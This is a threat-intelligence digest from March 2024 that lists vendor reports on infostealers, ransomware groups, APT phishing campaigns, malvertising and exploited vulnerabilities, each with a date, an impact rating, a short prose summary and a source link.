- Intel Name:
- The_GlorySprout_stealer_and_others
- Date of Scan:
- 2024-03-19
- Impact:
- LOW
- Summary:
- A new information stealer named GlorySprout surfaced in cybercrime forums in March 2024. Technical analysis shows it is likely a clone of the older Taurus stealer, sharing code similarities but lacking some features like Anti-VM. GlorySprout is unlikely to gain popularity compared to other stealers.
Source:
https://russianpanda.com/2024/03/16/The-GlorySprout-Stealer-or-a-Failed-Clone-of-Taurus-Stealer/
—
- Intel Source:
- Fortinet
- Intel Name:
- RA_World_Ransomware_continued_activity
- Date of Scan:
- 2024-03-19
- Impact:
- MEDIUM
- Summary:
- The blog provides an overview of the RA World ransomware, which encrypts files and steals data before demanding ransom for decryption and not leaking stolen files. The ransomware disables backups and deletes shadow copies to prevent recovery. It encrypts files and adds the .RAWLD extension, and drops a ransom note with contact info. The group operates TOR and non-TOR sites to publish stolen data. The blog covers infection vectors, victims, attack methods, protections, and mitigations.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-ra-world
—
- Intel Source:
- IBM X-Force
- Intel Name:
- Hackers_From_APT28_Targeting_Europe_America_Asia_in_Widespread_Phishing_Scheme
- Date of Scan:
- 2024-03-18
- Impact:
- MEDIUM
- Summary:
- IBM X-Force researchers have discovered that the threat actor APT28, which is associated with Russia, is involved in several active phishing attacks. These campaigns use lure documents that mimic government and non-governmental organizations (NGOs) throughout North and South America, Europe, the South Caucasus, Central Asia, and Asia. In addition to potentially actor-generated documents pertaining to finance, key infrastructure, executive engagements, cyber security, maritime security, healthcare, business, and defense industrial production, the unearthed lures comprise a combination of internal and publicly available documents.
Source:
https://securityintelligence.com/x-force/itg05-leverages-malware-arsenal/
—
- Intel Source:
- Trend Micro
- Intel Name:
- Malicious_Attacks_on_Global_Government_Institutions
- Date of Scan:
- 2024-03-18
- Impact:
- MEDIUM
- Summary:
- Trend Micro researchers have found that a malicious actor targeting global government institutions. Exploiting compromised government infrastructure, the group employs two distinct malware families known in Earth Krahang’s attacks. Their analysis also highlights the broad range of their targets and malicious activities, gleaned from telemetry data and exposed server files.
Source:
https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Find_Vulnerable_Networks_by_Using_the_Aiohttp_Bug
- Date of Scan:
- 2024-03-18
- Impact:
- LOW
- Summary:
- Researchers at Cyble have discovered that the ransomware actor “ShadowSyndicate” has been seen looking for servers that could be affected by CVE-2024-23334, a directory traversal vulnerability in the aiohttp Python module. Aiohttp is an open-source toolkit designed to manage massively concurrent HTTP requests without the need for conventional thread-based networking. It is built on top of Python’s Asyncio asynchronous I/O framework.
—
- Intel Source:
- Hunt.IO
- Intel Name:
- Open_Directory_Exposes_Phishing_Campaign_Targeting_Google_And_Naver_Credentials
- Date of Scan:
- 2024-03-18
- Impact:
- MEDIUM
- Summary:
- Hunt.IO researchers have observed an ongoing phishing campaign by a possible North Korean threat actor that aims to steal login credentials for Google and Naver. Apart from the numerous fake Google and Naver pages, the public folder that guided us to the finding additionally contains an instance of the open-source malware, Xeno-RAT, and KakaoTalk conversation transcripts between unidentified people talking about cryptocurrency trading.
—
- Intel Source:
- Netskope
- Intel Name:
- An_Intimidating_Azorult_Campaign_Operated_Via_Google_Sites
- Date of Scan:
- 2024-03-18
- Impact:
- LOW
- Summary:
- Researchers at Netskope have seen an evasive Azorult campaign in action that uses a variety of defense evasion strategies from delivery to execution in order to steal confidential information without drawing attention from the defense. This information thief was initially identified in 2016 and is capable of stealing private data, such as browser history, crypto wallet data, and user credentials.
—
- Intel Source:
- Uptycs
- Intel Name:
- Mac_malware_analysis_using_osquery
- Date of Scan:
- 2024-03-18
- Impact:
- LOW
- Summary:
- This article discusses the use of osquery, an operating system instrumentation framework, for analyzing malware on macOS systems. It describes how malware can use commands like chown and chmod to gain control and persistence on a system. The article also provides a detailed overview of using osquery for malware analysis, including a comparison with sandboxing solutions and a step-by-step guide for analyzing a specific malware, OSX/Dummy. It concludes by highlighting the benefits of using osquery for dynamic malware analysis on macOS and Linux systems.
Source:
https://www.uptycs.com/blog/malware-analysis-using-osquery
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- Examining_Latest_DEEP_GOSU_Attack_Campaign
- Date of Scan:
- 2024-03-18
- Impact:
- MEDIUM
- Summary:
- Securonix researchers have been keeping an eye on a new campaign, identified as DEEP#GOSU, that appears to be connected to the Kimsuky organization. It includes both recycled and newly created code and stagers. Although the Kimsuky organization has previously targeted South Korean victims, it is clear from the tradecraft seen that the group has switched to use a new script-based attack chain that makes use of numerous PowerShell and VBScript stagers in order to covertly infect systems. The attackers can keep an eye on keystrokes, the clipboard, and other session activity through scripts that are used later on.
—
- Intel Source:
- Any.Run
- Intel Name:
- ObserverStealer_Story_Continues_with_AsukaStealer
- Date of Scan:
- 2024-03-18
- Impact:
- LOW
- Summary:
- AsukaStealer and ObserverStealer are fundamentally similar in that they both use XOR encryption and C2 communication. AsukaStealer distinguishes itself, nevertheless, by forgoing the need for external DLL dependencies for data parsing and decryption in favor of server-side processes, which increase stealth and reduce its digital footprint. The malware developers’ intention to improve the stealer based on prior criticisms and the unfavorable user comments are thought to be the driving forces behind the rebranding of ObserverStealer, although with a different moniker.
Source:
https://any.run/cybersecurity-blog/asukastealer-malware-analysis/#appendix-1-iocs-7288
—
- Intel Source:
- Geoedge
- Intel Name:
- ScamClub_Malicious_VAST_Attack
- Date of Scan:
- 2024-03-18
- Impact:
- LOW
- Summary:
- A recent report details how a threat actor known as ScamClub has shifted to using video malvertising and VAST ads to distribute financial scams. The report analyzes ScamClub’s tactics, which involve exploiting the VAST protocol to embed malicious code in video ads that fingerprint users and redirect them to scam pages. The report highlights how ScamClub has infiltrated numerous ad platforms to reach a broad audience, with a focus on mobile users. It outlines the technical details of the attack flow, from crafting the malicious script to employing obfuscation techniques and evading detection. The report underscores the need for constant scanning of video assets to safeguard inventory and protect audiences.
Source:
https://www.geoedge.com/decoding-scamclubs-malicious-vast-attack
—
- Intel Source:
- ASEC
- Intel Name:
- CryptoWire_ransomware_distribution
- Date of Scan:
- 2024-03-18
- Impact:
- MEDIUM
- Summary:
- This report provides an analysis of the CryptoWire ransomware, an open-source malware initially spread in 2018 via phishing emails. The malware is written in Autoit and contains the decryption keys within the code, allowing files to be decrypted without payment. It encrypts files and leaves a ransom note demanding payment, but does not require payment due to the presence of the keys.
—
- Intel Source:
- Cyble
- Intel Name:
- A_new_stealer_name_Xehook
- Date of Scan:
- 2024-03-15
- Impact:
- MEDIUM
- Summary:
- Cyble analysts discovered a new stealer named Xehook back in January 2024. Xehook Stealer attacks the Windows operating system and is coded in the .Net programming language. The Threat Actor is insisting that this stealer offers dynamic data collection from all Chromium and Gecko-based browsers, supporting over 110 cryptocurrencies and 2FA extensions.
—
- Intel Source:
- F1tym1
- Intel Name:
- Online_Scam_campaign
- Date of Scan:
- 2024-03-15
- Impact:
- LOW
- Summary:
- Scammers aim for mobile phones because they are the most widespread, most utilized devices. They use subterfuge and scams to steal our money, information, and permissions.
Source:
https://f1tym1.com/2024/03/14/online-scam-scams-encountered-on-my-phone/
—
- Intel Source:
- PaloAlto
- Intel Name:
- A_Fake_Forum_Post_Contamining_GootLoader_Infection
- Date of Scan:
- 2024-03-15
- Impact:
- LOW
- Summary:
- Researchers at Palo Alto have discovered that another fake forum post links to the GootLoader malware. Since at least 2021, this distribution strategy has shown remarkable consistency.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Threat_actors_leverage_document_for_credential_and_session_token_theft
- Date of Scan:
- 2024-03-15
- Impact:
- LOW
- Summary:
- Cisco Talos Incident Response (Talos IR) has observed the ongoing use of legitimate digital document publishing (DDP) sites for phishing, credential theft, and session token theft during recent incident response and threat intelligence engagements.
Source:
https://blog.talosintelligence.com/threat-actors-leveraging-document-publishing-sites/
—
- Intel Source:
- CYFIRMA Research
- Intel Name:
- Exdefacer_Turns_Seller_of_Discord_Stealer_aka_Nikki_Stealer
- Date of Scan:
- 2024-03-15
- Impact:
- LOW
- Summary:
- Researchers from CYFIRMA have discovered that a person who was formerly well-known for vandalizing websites has switched to offering a Discord stealer created using the Electron framework, named Nikki Stealer. The latest developments in Nikki Stealer v9 demonstrate how quickly this tool is evolving. Analysis of the Nikki Stealer Discord server’s conversation logs reveals that users are complaining about the device’s poor detection rate. Additionally, the stealer’s developer can be seen talking candidly about drug use in the conversation. Remarkable parallels have been noted between Fewer and Nikki Stealer.
—
- Intel Source:
- SOCRadar
- Intel Name:
- GhostSec_profile
- Date of Scan:
- 2024-03-15
- Impact:
- LOW
- Summary:
- GhostSec’s primary target is online terrorism and violent extremism. GhostSec quickly gained recognition for its approach to confronting extremist groups online. The group even alleges that some of its members were employed by government agencies during an alleged meeting with the US government in those years. GhostSec’s initial goal revolved around the somewhat vague aim of disrupting the online presence and communication of terrorist organizations like ISIS (Islamic State of Iraq and Syria) and Al-Qaeda. However, while the group initially appeared neutral in the Israel-Hamas conflict, they later declared their support for Palestine against what they perceived as Israel’s war crimes.
—
- Intel Source:
- Checkpoint
- Intel Name:
- DocLink_Defender_prevention_technology
- Date of Scan:
- 2024-03-15
- Impact:
- LOW
- Summary:
- DocLink Defender leverages the latest in analytical technology to intercept and neutralize malicious documents instantly.
—
- Intel Source:
- Zscaler
- Intel Name:
- Roblox_Users_Targeted_with_Tweaks_Malware
- Date of Scan:
- 2024-03-15
- Impact:
- LOW
- Summary:
- Zscaler’s Threat researchers observed a new attack campaign spreading an infostealer called Tweaks that targets Roblox users. Attackers are exploiting platforms, like YouTube and Discord, to distribute Tweaks to Roblox users, by evading detection by web filter block lists that typically block known malicious servers. Attackers share malicious files disguised as Frames Per Second (FPS) optimization packages with users and, in turn, users infect their systems with Tweaks malware.
—
- Intel Source:
- Trendmicro
- Intel Name:
- DarkGate_Operators_Exploit_Microsoft_Windows_SmartScreen_Bypass
- Date of Scan:
- 2024-03-15
- Impact:
- MEDIUM
- Summary:
- The Zero Day Initiative tracked a DarkGate campaign which was observed last January 2024 where DarkGate operators exploited CVE-2024-21412 and linked to the Water Hydra APT zero-day analysis.
—
- Intel Source:
- Esentire
- Intel Name:
- An_increase_in_tax_themed_phishing_emails
- Date of Scan:
- 2024-03-15
- Impact:
- LOW
- Summary:
- This month, eSentire has seen a spike in malware delivered through tax-themed phishing emails. Threat Actors are trying to exploit the tax-related communications lures to trick individuals into opening malicious email links, leading to malware infections. The observed phishing campaigns utilize tax-themed lures, including tax documents, tax returns, and IRS letters. These emails often appear to be sent from legitimate tax authorities or financial institutions and include malicious links leading to malware payloads hosted on attacker-controlled infrastructure.
Source:
https://www.esentire.com/security-advisories/increase-in-tax-themed-email-lure
—
- Intel Source:
- Cybereason
- Intel Name:
- The_ActiveMQ_Vulnerability_Is_Being_Exploited_by_Messengers
- Date of Scan:
- 2024-03-15
- Impact:
- LOW
- Summary:
- Researchers from Cybereason have looked into an event on a Linux server where malicious shell (bash) executions occurred via a Java process that was utilizing Apache ActiveMQ. An open-source message broker called ActiveMQ is used to facilitate communication across disparate servers that may be running different operating systems or have different languages.
Source:
https://www.cybereason.com/blog/beware-of-the-messengers-exploiting-activemq-vulnerability
—
- Intel Source:
- Palo Alto
- Intel Name:
- BunnyLoader_3_analysis
- Date of Scan:
- 2024-03-15
- Impact:
- MEDIUM
- Summary:
- Unit 42 Palo Alto shared their analysis of the new released BunnyLoader 3.0 and on the infrastructure and an overview of its capabilities. BunnyLoader is a constantly developing malware with the capability to steal information, credentials, and cryptocurrency, as well as deliver additional malware to its victims. The threat actor behind this malware is known as “Player” or “Player_Bunny.” The buyer determines what malware BunnyLoader delivers. The author of this malware prohibits its use against Russian systems.
Source:
https://unit42.paloaltonetworks.com/analysis-of-bunnyloader-malware/
—
- Intel Source:
- Securelist
- Intel Name:
- The_Chinese_users_targeted_by_infected_text_editors
- Date of Scan:
- 2024-03-15
- Impact:
- LOW
- Summary:
- Securelist analysts discovered two related cases where modified versions of popular text editors were distributed in this system: in the first case, the malicious resource appeared in the advertisement section; in the second case, at the top of the search results.
Source:
https://securelist.com/trojanized-text-editor-apps/112167/
—
- Intel Source:
- Fortinet
- Intel Name:
- Attackers_Using_GitHub_and_AWS_to_Spread_RATs_Through_Phishing_Campaigns
- Date of Scan:
- 2024-03-13
- Impact:
- LOW
- Summary:
- A recent phishing effort is discovered, in which attackers exploit publicly accessible platforms like GitHub and Amazon web servers to store malware, which is subsequently used via email to initiate an attack campaign and take over the newly compromised systems. According to FortiGuard Labs, the email tricks recipients into opening a dangerous, high-severity Java downloader that tries to disseminate the well-known STRRAT RAT and a brand-new VCURMS remote access trojan (RAT). Every platform that has Java installed is susceptible, and it can affect any kind of business.
Source:
https://www.fortinet.com/blog/threat-research/vcurms-a-simple-and-functional-weapon
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Multiple_Ongoing_Malvertising_Activities_Used_to_Distribute_FakeBat
- Date of Scan:
- 2024-03-13
- Impact:
- LOW
- Summary:
- FakeBat malvertising campaigns using two kinds of ad URLs. They were misusing URL/analytics shorteners, which are perfect for cloaking, as seen in past malvertising efforts. This technique gives a threat actor the ability to select a “good” or “bad” destination URL according to their own predetermined criteria (such as the IP address, user agent, and time of day).
—
- Intel Source:
- Securelist
- Intel Name:
- Malicious_Advertising_Using_Search_Engines
- Date of Scan:
- 2024-03-13
- Impact:
- LOW
- Summary:
- Researchers at Securelist have noticed a rise in the quantity of malicious operations that disseminate and distribute malware via Google Advertising. Rhadamanthys and RedLine, two distinct stealers, were misusing the search engine promotion scheme to infect victims’ computers with malicious payloads. They appear to employ the same method of imitating a website connected to popular programs like Blender 3D and Notepad++.
Source:
https://securelist.com/malvertising-through-search-engines/108996/
—
- Intel Source:
- G DATA
- Intel Name:
- RisePro_Stealer_Is_Aiming_at_Github_Users
- Date of Scan:
- 2024-03-13
- Impact:
- MEDIUM
- Summary:
- Researchers from G DATA Cyber Defense have found at least 13 of these repositories, which are part of a RisePro stealer campaign that the threat actors have dubbed “gitgub.” The repositories have a similar appearance and offer free cracked software in a README.md file. On Github, circles in the colors green and red are frequently used to indicate the status of automated builds. Four green Unicode circles that appear to show a status along with the current date and give the impression of validity and recentness were inserted by Gitgub threat actors to their README.md file.
Source:
https://www.gdatasoftware.com/blog/2024/03/37885-risepro-stealer-campaign-github
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Decoding_Malicious_Scripts_Using_ChatGPT
- Date of Scan:
- 2024-03-13
- Impact:
- LOW
- Summary:
- Researchers from INC.SANS have discovered a malicious Python script that has a low VirusTotal score of 2/61. By the time they looked at it, it had been obfuscated. All of the intriguing strings were compressed, Base64-encoded, and hex-encoded.
—
- Intel Source:
- SOC Radar
- Intel Name:
- A_Dark_Web_Profile_of_Meow_Ransomware
- Date of Scan:
- 2024-03-12
- Impact:
- LOW
- Summary:
- Four ransomware strains that are descended from Conti’s ransomware strain that was leaked were found in late 2022. The Meow ransomware was one of them. This crypto-ransomware was detected operating between the end of August and the first part of September 2022, and it continued to do so until February 2023. They stopped operating in March 2023 after a free decryptor for the Meow ransomware was made available. There is still an active organization called Meow that entered 2024 rather quickly and has already claimed nine victims. It appears that this gang uses the RaaS paradigm; yet, in March 2024 alone, three victims were reported, and the institutions they target are not insignificant ones.
Source:
https://socradar.io/dark-web-profile-meow-ransomware/
—
- Intel Source:
- Reversing Labs
- Intel Name:
- Attacks_on_Crypto_Wallet_Recovery_Passwords_by_Malicious_PyPI_Packages
- Date of Scan:
- 2024-03-12
- Impact:
- LOW
- Summary:
- Researchers at ReversingLabs have discovered a brand-new harmful campaign that consists of seven distinct open-source packages on the Python Package Index (PyPI) with 19 versions, the oldest of which was released in December 2022. The campaign aims to steal mnemonic phrases that are used to recover crypto wallets that have been lost or destroyed.
—
- Intel Source:
- Symantec
- Intel Name:
- Operators_Adapt_to_Disruption_as_Ransomware_Attacks_Rise
- Date of Scan:
- 2024-03-12
- Impact:
- LOW
- Summary:
- Even though the number of attacks that ransomware operators claim to have carried out dropped by little more than 20% in the fourth quarter of 2023, ransomware activity is still on the rise. Attackers have continuously improved their strategies, shown that they can react quickly to disruptions, and discovered new means of infecting victims.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-attacks-exploits
—
- Intel Source:
- Splunk
- Intel Name:
- SnakeKeylogger_loader_technics_and_tactics
- Date of Scan:
- 2024-03-12
- Impact:
- MEDIUM
- Summary:
- The Splunk Threat Research Team provided in their blog deep insights and details to share with security analysts and blue teamers on how to defend and be aware of these suspicious activities and tactics.
—
- Intel Source:
- ASEC
- Intel Name:
- Infostealer_Posing_as_Installer_For_Adobe_Reader
- Date of Scan:
- 2024-03-12
- Impact:
- LOW
- Summary:
- Researchers from ASEC have found that an infostealer that poses as the installation for Adobe Reader is being distributed. The file is being distributed by the threat actor in PDF format, requesting that people download and execute it.
—
- Intel Source:
- ASEC
- Intel Name:
- Spread_of_Malware_MSIX_Pretended_to_Be_Notion_Installer
- Date of Scan:
- 2024-03-11
- Impact:
- LOW
- Summary:
- The Notion installation is actually a ruse to transmit MSIX malware. The distribution website bears a resemblance to the main Notion homepage. When the user clicks the download button, a file called “Notion-x86.msix” is downloaded. This file, a Windows app installation, has a legitimate certificate used to certify it. When the user runs the file, the pop-up appears. When you click the Install button, malware infects Notion and installs on your computer.
—
- Intel Source:
- GuidePoint Security
- Intel Name:
- The_TeamCity_Exploit_Leads_BianLian_to_Embrace_PowerShell
- Date of Scan:
- 2024-03-11
- Impact:
- MEDIUM
- Summary:
- Researchers at GuidePoint have discovered malicious activities on a client’s network. After locating a weak point in the TeamCity server, the threat actor used CVE-2024-27198 / CVE-2023-42793 to gain initial access to the system. Within TeamCity, the threat actor created users and executed malicious commands using the service account associated with the TeamCity product.
Source:
https://www.guidepointsecurity.com/blog/bianlian-gos-for-powershell-after-teamcity-exploitation/
—
- Intel Source:
- Darktrace
- Intel Name:
- A_New_Phishing_Attack_Targeting_Dropbox
- Date of Scan:
- 2024-03-11
- Impact:
- LOW
- Summary:
- Darktrace researchers have alerted users to a well-known new phishing and malspam campaign that uses Dropbox emails to target users of well-known Software-as-a-Service (SaaS) platforms. According to recent research, a fresh phishing attempt targeting Dropbox has been effective in getting over MFA (multi-factor authentication) safeguards. By tricking users into downloading malware, this hack seeks to reveal login information.
—
- Intel Source:
- Sucuri
- Intel Name:
- Malicious_Campagin_Exploiting_Stored_XSS_in_Popup_Builder
- Date of Scan:
- 2024-03-11
- Impact:
- LOW
- Summary:
- The malicious code that can be found in the Custom JS or CSS part of the WordPress admin interface which is internally saved in the wp_postmeta database table is injected by the attackers using a known vulnerability in the Popup Builder WordPress plugin.
—
- Intel Source:
- Inquest
- Intel Name:
- An_emerging_information_stealing_Project_trojan
- Date of Scan:
- 2024-03-08
- Impact:
- LOW
- Summary:
- The article discusses the emergence of a new trojan called Planet Stealer, which is designed to steal sensitive information from victim hosts. It is written in Go and is being sold in underground forums. This type of information-stealing malware is in high demand among financially motivated criminals, indicating a thriving market for such tools.
Source:
https://inquest.net/blog/around-we-go-planet-stealer-emerges/
—
- Intel Source:
- Checkpoint
- Intel Name:
- Magnet_Goblin_Uses_1_Day_Vulnerabilities_to_Target_Publicly_Facing_Servers
- Date of Scan:
- 2024-03-08
- Impact:
- MEDIUM
- Summary:
- A financially driven threat actor, Magnet Goblin swiftly embraces and makes use of one-day vulnerabilities in services that are accessible to the public as a means of spreading infection. In one instance using Ivanti Connect Secure VPN (CVE-2024-21887), the exploit was added to the group’s toolkit in less than a day following the publication of a proof of concept.
—
- Intel Source:
- Security Intelligence
- Intel Name:
- New_Fakext_Malware_Targeting_Latin_American_Banks
- Date of Scan:
- 2024-03-08
- Impact:
- LOW
- Summary:
- IBM security researchers have discovered a new, widely distributed malware called Fakext which leverages a malicious Edge plugin to launch web-injection and man-in-the-browser attacks. Over 35,000 infected sessions have been seen by researchers since November 2023; the majority of these sessions originate from Latin America (LATAM), with a lesser proportion from North America and Europe.
Source:
https://securityintelligence.com/posts/fakext-targeting-latin-american-banks/
—
- Intel Source:
- ESET
- Intel Name:
- Compromised_Supply_Chain_and_Sophisticated_Toolkit_Exposed
- Date of Scan:
- 2024-03-08
- Impact:
- LOW
- Summary:
- ESET researchers identified a cyberespionage campaign directed at Tibetans across various regions. The threat actors deployed downloaders, droppers, and backdoors, such as the exclusive MgBot and the recently added Nightdoor, targeting networks in East Asia. Additionally, the attackers compromised the supply chain of a Tibetan language translation app developer.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Navigating_the_tax_season_global_surge
- Date of Scan:
- 2024-03-08
- Impact:
- MEDIUM
- Summary:
- As tax deadlines approach globally, individuals and businesses must be vigilant against an increase in tax-related scams and ransomware attacks. Scammers exploit this period to launch sophisticated phishing campaigns, aiming to steal personal information, financial data, or directly extract money through deceit. Notably, the collaboration between ransomware groups GhostSec and Stormous has marked a significant rise in ransomware threats, including the deployment of the STMX_GhostLocker ransomware-as-a-service.
Source:
https://blog.talosintelligence.com/threat-source-newsletter-march-7-2024/
—
- Intel Source:
- Zscaler
- Intel Name:
- Beware_of_Malware_Delivering_Spoofing_Websites
- Date of Scan:
- 2024-03-07
- Impact:
- LOW
- Summary:
- Researchers at Zscaler have identified a threat actor that creates fake websites for Zoom, Google Meet, and Skype in order to disseminate malware. The threat actor infects Windows users with NjRAT and DCRat and distributes SpyNote RAT to Android users. By using shared web hosting, the attacker was able to host all of these fake online meeting sites under a single IP address. As seen by all of the numbers below, the fake websites were all in Russian. Furthermore, the attackers used URLs that closely matched the real websites to host these fictitious ones.
—
- Intel Source:
- Harfanglab
- Intel Name:
- A_Thorough_Examination_of_I_SOONs_Commercial_Offering
- Date of Scan:
- 2024-03-06
- Impact:
- LOW
- Summary:
- I-Soon’s business proposal indicates that processing gathered data is the primary problem, not initially failing to meet goals. Their products classify and sort stolen documents with the aid of deep learning. The business seems to have problems finding malware and usually uses rudimentary techniques (phishing, for example). But in the last ten years, they have violated numerous strategic targets all around the world.
Source:
https://harfanglab.io/en/insidethelab/isoon-leak-analysis/
—
- Intel Source:
- Cado Security
- Intel Name:
- The_Spinning_Yarn_Linux_Malware_Campaign_Targeting_Misconfigured_Servers
- Date of Scan:
- 2024-03-06
- Impact:
- MEDIUM
- Summary:
- Researchers at Cado Security Labs have discovered a new malware campaign that targets misconfigured servers that host web-facing services including Redis, Docker, Apache Hadoop YARN, and Confluence. The campaign makes use of several distinct and unreported payloads, such as four Golang binaries, which are instruments for automatically locating and infecting sites that are hosting the aforementioned services. By utilizing common misconfigurations and an n-day vulnerability, the attackers use these tools to generate exploit code that allows them to conduct Remote Code Execution (RCE) attacks and infect new hosts.
—
- Intel Source:
- Intel-Ops
- Intel Name:
- Examining_Infrastructure_That_8Base_Using_in_Relation_to_Phobos_Ransomware
- Date of Scan:
- 2024-03-06
- Impact:
- MEDIUM
- Summary:
- Intel-Ops is actively monitoring infrastructure that has been determined to be a part of the 8Base Ransomware organization, which is responsible for operating the Phobos ransomware. A dispersed group of affiliates with extremely similar TTPs, along with several variants (Eking, Eight, Elbie, Devos, and Faust), make Phobos an estimated Ransomware-as-a-Service (RaaS).
—
- Intel Source:
- Qurium
- Intel Name:
- The_fake_video_connected_to_Russian_cyberscam_network
- Date of Scan:
- 2024-03-06
- Impact:
- MEDIUM
- Summary:
- A deep fake video of Maria Ressa promoting a crypto-currency scam was released in early February 2024. The video was hosted on a domain that contained links to a Russian cyberscam network. Metadata analysis revealed Russian influence behind the creation of the deep fake and fake news articles designed to discredit Ressa.
—
- Intel Source:
- Sucuri
- Intel Name:
- Distributed_WordPress_Brute_Force_Attack
- Date of Scan:
- 2024-03-06
- Impact:
- MEDIUM
- Summary:
- The article discusses a recent attack on WordPress websites, where infected websites are used to launch a distributed brute force attack to guess passwords for other third-party sites. The attackers then visit the target sites to download valid credentials. The article provides statistics and tips for mitigating the risk of such attacks, as well as a new development in website hacks involving Web3 crypto wallet drainers. It also explains the process of uploading encrypted credentials and the different stages of the attack. The article concludes by offering assistance for those who believe their website may be infected.
Source:
https://blog.sucuri.net/2024/03/from-web3-drainer-to-distributed-wordpress-brute-force-attack.html
—
- Intel Source:
- Cyfirma Research
- Intel Name:
- New_Lighter_Ransomware_Targeting_Individuals_in_UK_and_US
- Date of Scan:
- 2024-03-06
- Impact:
- MEDIUM
- Summary:
- Researchers at Cyfirma have identified a brand-new malware developed by the Lighter Extortion group, which they have named Lighter malware. An uncommon instance of triple extortion, in which the threat actors make threats against the victim if the ransom is not paid in addition to encrypting the data and exfiltrating it. The threat actors are probably going to target people in the US and the UK based on the ransom note.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Diving_Deep_into_Earth_Kapre_Group
- Date of Scan:
- 2024-03-06
- Impact:
- LOW
- Summary:
- Researchers at Trend Micro have investigated Earth Kapre, also known as RedCurl and Red Wolf. The successful investigation that revealed Earth Kapre’s intrusion sets used in a recent event, as well as the way the team used threat intelligence to link the evidence that was taken out to the cyberespionage threat organization.
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA4903_Using_Phishing_Attack_on_US_Government_and_Small_Businesses
- Date of Scan:
- 2024-03-06
- Impact:
- MEDIUM
- Summary:
- Researchers at Proofpoint have noticed a rise in credential phishing and fraud efforts in the middle of 2023 and early 2024 that use themes other than TA4903. The performer started parodying small and medium-sized enterprises (SMBs) across a range of sectors, including as manufacturing, energy, finance, food and beverage, and construction. The pace of BEC themes has also increased, according to Proofpoint, with themes like “cyberattacks” being used to entice victims to divulge their banking and payment information.
—
- Intel Source:
- ASEC
- Intel Name:
- WebLogic_Server_Exploited_by_z0Miner
- Date of Scan:
- 2024-03-06
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered multiple instances of threat actors targeting weak Korean servers. The following report describes a recent incident involving an attack against Korean WebLogic servers by the threat actor “z0Miner.”
—
- Intel Source:
- Sekoia
- Intel Name:
- The_DDoSia_Project_of_NoName057_16
- Date of Scan:
- 2024-03-06
- Impact:
- LOW
- Summary:
- Since the start of the conflict in Ukraine, a number of organizations dubbed “nationalist hacktivists” have surfaced, mostly on the Russian side, to fuel hostilities between Moscow and Kyiv. Of these organizations, the pro-Russian group NoName057(16) has gained notoriety for starting Project DDoSia, a group effort to launch massive distributed denial-of-service (DDoS) attacks against organizations (private companies, government agencies, and state institutions) that are part of nations that back Ukraine, primarily NATO members.
Source:
https://blog.sekoia.io/noname05716-ddosia-project-2024-updates-and-behavioural-shifts
—
- Intel Source:
- Sophos, GitHub
- Intel Name:
- Attackers_still_abusing_Terminator_tool_and_variants
- Date of Scan:
- 2024-03-06
- Impact:
- MEDIUM
- Summary:
- A threat intelligence report describes that threat actors continue to leverage vulnerable drivers like Zemana Anti-Logger and Anti-Malware to disable security products through Bring Your Own Vulnerable Driver attacks. Variants of the Terminator tool that exploits these drivers are still observed in the wild. The actors use the drivers for lateral movement and privilege escalation as part of ransomware campaigns targeting healthcare and other industries.
Source:
https://news.sophos.com/en-us/2024/03/04/itll-be-back-attackers-still-abusing-terminator-tool-and-variants/
https://github.com/sophoslabs/IoCs/blob/master/Zemana-driver-IoCs.csv
—
- Intel Source:
- Double Agent
- Intel Name:
- A_novel_backdoor_GTPDOOR
- Date of Scan:
- 2024-03-05
- Impact:
- LOW
- Summary:
- GTPDOOR is Linux malware that communicates C2 traffic over GTP-C signaling messages, blending in with normal telco traffic. It can execute commands sent in GTP echo requests and probe hosts covertly via TCP packets. Versions target x86 and i386 architectures.
Source:
https://doubleagent.net/telecommunications/backdoor/gtp/2024/02/27/GTPDOOR-COVERT-TELCO-BACKDOOR
—
- Intel Source:
- Cisco Talos
- Intel Name:
- A_surge_of_new_GhostLocker_2_ransomware_by_GhostSec_threat_group
- Date of Scan:
- 2024-03-05
- Impact:
- MEDIUM
- Summary:
- The article discusses the evolution and joint operation of GhostSec and Stormous, two hacking groups that have collaborated to conduct double extortion attacks using the GhostLocker and StormousX ransomware programs. It provides details on the various versions of GhostLocker, its C2 panels, and the features provided to affiliates. The article also mentions two new tools in GhostSec’s arsenal, the GhostSec Deep Scan toolset and GhostPresser, which are used for scanning and attacking legitimate websites. It discusses the groups’ focus on raising funds for hacktivists and threat actors and their new ransomware-as-a-service program. The article also provides information on the capabilities of GhostPresser, a tool used to target WordPress websites, and how Cisco Secure Endpoint and other Cisco products can prevent the execution of this malware. It also includes a list of indicators associated with this threat.
Source:
https://blog.talosintelligence.com/ghostsec-ghostlocker2-ransomware/
—
- Intel Source:
- Cyfirma Research
- Intel Name:
- An_Extremely_Harmful_Malware_WinDestroyer
- Date of Scan:
- 2024-03-05
- Impact:
- LOW
- Summary:
- Researchers from CYFIRMA have discovered WinDestroyer, a harmful malware. The ransomware does not seek a ransom, indicating that it is not motivated by money. This advanced threat uses sophisticated tactics to render systems unusable, including lateral movement capabilities, API hammering, and DLL reload attacks.
—
- Intel Source:
- NS Focus Global
- Intel Name:
- The_security_threats_from_malicious_machine_learning_models
- Date of Scan:
- 2024-03-05
- Impact:
- LOW
- Summary:
- The article discusses the potential security threats posed by malicious machine learning (ML) models on the Hugging Face platform. It provides background information on a recent report that found some ML models on Hugging Face may be used to attack the user environment, leading to code execution and providing attackers with full control of the infected machine. The affected models, specifically the baller423/goober2 model, are discussed in detail, along with a technical analysis of how they work and how they can be loaded and executed. The article also highlights the potential risks associated with PyTorch and Tensorflow models. It concludes with mitigation methods, such as using Hugging Face’s new format Safetensors and implementing security measures like malware and Pickle scanning. The article emphasizes the importance of thorough scrutiny and safety measures when dealing with ML models from untrusted sources and the urgency of AI model security.
Source:
https://nsfocusglobal.com/ai-supply-chain-security-hugging-face-malicious-ml-models/
—
- Intel Source:
- Cert.360
- Intel Name:
- New_variant_of_SupermanMiner_mining_malware
- Date of Scan:
- 2024-03-05
- Impact:
